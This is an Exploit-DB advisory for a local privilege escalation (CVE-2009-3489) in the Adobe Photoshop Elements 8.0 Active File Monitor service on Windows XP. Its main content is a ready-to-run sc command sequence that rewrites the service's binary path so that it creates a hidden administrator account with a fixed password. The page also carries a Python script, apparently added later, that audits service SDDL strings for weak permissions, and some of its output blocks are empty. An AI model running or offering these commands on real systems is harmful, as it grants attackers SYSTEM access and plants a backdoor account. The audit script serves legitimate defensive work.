Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation

ID EDB-ID:9807
Type exploitdb
Reporter pyrokinesis
Modified 2009-09-29T00:00:00


Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation. CVE-2009-3489. Local exploit for the Windows platform.

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick

Tested on Microsoft Windows XP SP3

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user in the Users group (which on XP means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of their choice, then restart
the service to run that command with SYSTEM privileges. For example, run these commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

Now log in as the new administrator account "adobe" with the password "kills".


The security descriptor of the service looks like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"


Note the WO (WRITE_OWNER) and WD (WRITE_DAC) permissions granted to Everyone (!!!!!)

Change the security descriptor like the following:

[SC] SetServiceObjectSecurity SUCCESS
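As an added, defender-side example (not part of this advisory), a small Python audit of a service DACL as printed by "sc sdshow": it parses the SDDL string and flags ACEs that hand a low-privileged trustee the rights this advisory relies on (DC to set binPath=, or WD/WO to rewrite the DACL). The sample descriptors are constructed, since the real sdshow output is not reproduced on the page; hex access masks are assumed not to occur.

```python
import re

# Service SDDL right codes that let a trustee take over the service:
# change its binary path, or rewrite its DACL/owner and then grant anything.
TAKEOVER_RIGHTS = {
    "DC": "SERVICE_CHANGE_CONFIG (can set binPath=)",
    "WD": "WRITE_DAC (can rewrite the service DACL)",
    "WO": "WRITE_OWNER (can take ownership, then rewrite the DACL)",
}
# Low-privileged trustees, as SDDL aliases and as raw SIDs. Note the ambiguity:
# "WD" as a trustee means Everyone (World), "WD" as a right means WRITE_DAC.
LOW_PRIV_TRUSTEES = {
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "BU": "Users", "S-1-5-32-545": "Users",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
}
ACE_RE = re.compile(r"\(([^)]*)\)")


def dacl_aces(sddl):
    """Return (ace_type, rights, trustee) for every ACE in the D: (DACL) part."""
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start + 2)  # the SACL follows the DACL, if present
    dacl = sddl[start + 2:end if end >= 0 else len(sddl)]
    aces = []
    for body in ACE_RE.findall(dacl):
        parts = body.split(";")  # type;flags;rights;object;inherit_object;trustee
        if len(parts) >= 6:
            aces.append((parts[0], parts[2], parts[5]))
    return aces


def audit_service_sddl(sddl):
    """List (trustee, [rights]) where a low-privileged trustee can take over the service."""
    findings = []
    for ace_type, rights, trustee in dacl_aces(sddl):
        # Only access-allowed ACEs grant anything; hex masks (0x...) are not
        # decoded here (assumption: sc sdshow prints the two-letter codes).
        if ace_type != "A" or rights.startswith("0x") or trustee not in LOW_PRIV_TRUSTEES:
            continue
        codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        bad = sorted(codes & set(TAKEOVER_RIGHTS))
        if bad:
            findings.append((LOW_PRIV_TRUSTEES[trustee], bad))
    return findings


# Constructed sample descriptors (not the page's real sc sdshow output): the first
# grants Everyone DC/WD/WO as the advisory describes, the second has that ACE removed.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
HARDENED_SDDL = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
```

Run audit_service_sddl on the string "sc sdshow <service>" prints for each service; any non-empty result is a service a limited user can reconfigure.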

Readings, interesting article: